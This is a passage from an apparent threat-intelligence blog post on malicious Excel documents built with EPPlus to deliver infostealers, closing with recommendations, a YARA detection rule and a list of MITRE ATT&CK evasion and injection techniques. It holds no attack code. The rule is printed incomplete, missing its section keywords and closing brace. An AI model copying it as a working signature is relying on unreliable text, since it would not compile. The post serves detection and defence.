  • The threat actor observed has worked out a new method to create malicious Office documents with a way to at least slightly reduce detection mechanisms;
  • The actor is likely experimenting and evolving its methodology in which malicious Office documents are created, potentially automating the workflow;
  • While the targeting seems rather limited for now, it’s possible these first runs were intended for testing rather than a full-fledged campaign;
  • Recent uptick in detections submitted to VirusTotal confirms the actor may be ramping up their operations;
  • While the approach to create malicious documents is unique, the methodologies for payload delivery as well as actual payloads are not, and should be stopped or detected by modern technologies;
  • Of interest is a recent blog post published by Xavier Mertens on the SANS diary Tracking A Malware Campaign Through VT[6]. It appears another security researcher has also been tracking these documents, however, they have extracted the VBA code from the maldocs and uploaded that portion. These templates relate to the PowerShell way of downloading the next stage.

In conclusion, NVISO assesses this specific malicious Excel document creation technique is likely to be observed more in the wild, albeit missed by email gateways or analysts, as payload analysis is often considered more interesting. However, blocking and detection of these types of novelties, such as the maldoc creation described in this blog, enables organizations to detect and respond quicker in case an uptick or similar campaign occurs. The recommendations section provides ruling and indicators as a means of detection.


  • Filter email attachments and emails sent from outside your organization;
  • Implement robust endpoint detect and respond defenses;
  • Create phishing awareness trainings and perform a phishing exercise.



We provide the following rule to implement in your detection mechanisms for use in further hunting missions.

rule xlsm_without_metadata_and_with_date {
        description = "Identifies .xlsm files created with EPPlus"
        author = "NVISO (Didier Stevens)"
        date = "2020-07-12"
        reference = "http://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers"
        tlp = "White"
        $opc = "[Content_Types].xml"
        $ooxml = "xl/workbook.xml"
        $vba = "xl/vbaProject.bin"
        $meta1 = "docProps/core.xml"
        $meta2 = "docProps/app.xml"
        $timestamp = {50 4B 03 04 ?? ?? ?? ?? ?? ?? 00 00 21 00}
        uint32be(0) == 0x504B0304 and ($opc and $ooxml and $vba)
        and not (any of ($meta*) and $timestamp)

This rule will match documents with VBA code created with EPPlus, even if they are not malicious. We had only a couple of false positives with this rule (documents created with other benign software), and quite some corrupt samples (incomplete ZIP files).



Indicators of compromise can be found on our Github page here.


  • Initial Access:
    • T1566.001 Phishing: Spearphishing Attachment
  • Execution:
    • T1204.002 User Execution: Malicious File
  • Defense Evasion:
    • T1140 Deobfuscate/Decode Files or Information
    • T1036.005 Masquerading: Match Legitimate Name or Location
    • T1027.001 Obfuscate Files or Information: Binary Padding
    • T1027.002 Obfuscate Files or Information: Software Packing
    • T1027.003 Obfuscate Files or Information: Steganography
    • T1055.001 Process Injection: DLL Injection
    • T1055.002 Process Injection: PE Injection
    • T1497.001 Virtualization/Sandbox Evasion: System Checks



This blog post was created based on the collaborative effort of :

  • There are no more articles